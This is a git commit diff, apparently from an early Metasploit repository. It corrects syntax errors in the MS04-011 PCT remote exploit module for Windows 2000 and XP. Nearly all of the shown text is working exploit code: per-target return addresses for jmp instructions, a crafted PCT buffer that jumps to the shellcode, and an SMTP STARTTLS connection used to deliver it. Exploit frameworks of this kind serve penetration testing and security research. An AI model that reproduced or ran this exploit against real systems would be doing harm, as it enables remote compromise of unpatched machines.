Woops
git-svn-id: file:///home/svn/incoming/trunk@3128 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
ab597b4172
commit
a990e20067
|
|
@ -50,49 +50,49 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
||||||
'Windows 2000 SP4',
|
'Windows 2000 SP4',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x67419ce8], # jmp [esp + 0x6c]
|
'Ret' => 0x67419ce8, # jmp [esp + 0x6c]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 2000 SP3',
|
'Windows 2000 SP3',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x67419e1d], # jmp [esp + 0x6c]
|
'Ret' => 0x67419e1d, # jmp [esp + 0x6c]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 2000 SP2',
|
'Windows 2000 SP2',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x6741a426], # jmp [esp + 0x6c]
|
'Ret' => 0x6741a426, # jmp [esp + 0x6c]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 2000 SP1',
|
'Windows 2000 SP1',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x77e4f44d], # jmp [ebx + 0x14]
|
'Ret' => 0x77e4f44d, # jmp [ebx + 0x14]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows 2000 SP0',
|
'Windows 2000 SP0',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x7658a6cb], # jmp [ebx + 0x0e]
|
'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows XP SP0',
|
'Windows XP SP0',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x0ffb7de9], # jmp [esp + 0x6c]
|
'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Windows XP SP1',
|
'Windows XP SP1',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Ret' => 0x0ffb832f], # jmp [esp + 0x6c]
|
'Ret' => 0x0ffb832f, # jmp [esp + 0x6c]
|
||||||
},
|
},
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
|
|
@ -121,8 +121,8 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
||||||
# eb0f => jmp short 11 to shellcode
|
# eb0f => jmp short 11 to shellcode
|
||||||
|
|
||||||
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
|
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
|
||||||
"\xeb\x0f" + 'XXXXXXXXXXX'+
|
"\xeb\x0f" + 'XXXXXXXXXXX' +
|
||||||
[target.ret ^ 0xffffffff)].pack('V')+
|
[target.ret ^ 0xffffffff].pack('V')+
|
||||||
payload.encoded
|
payload.encoded
|
||||||
|
|
||||||
# Connect to a SMTP service, call STARTTLS
|
# Connect to a SMTP service, call STARTTLS
|
||||||
|
|
@ -135,7 +135,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
||||||
sock.put("STARTTLS\r\n")
|
sock.put("STARTTLS\r\n")
|
||||||
resp = sock.get_once
|
resp = sock.get_once
|
||||||
|
|
||||||
if (not resp =~ /^220/)
|
if (resp and resp !~ /^220/)
|
||||||
print_status("Warning: this server may not support STARTTLS")
|
print_status("Warning: this server may not support STARTTLS")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue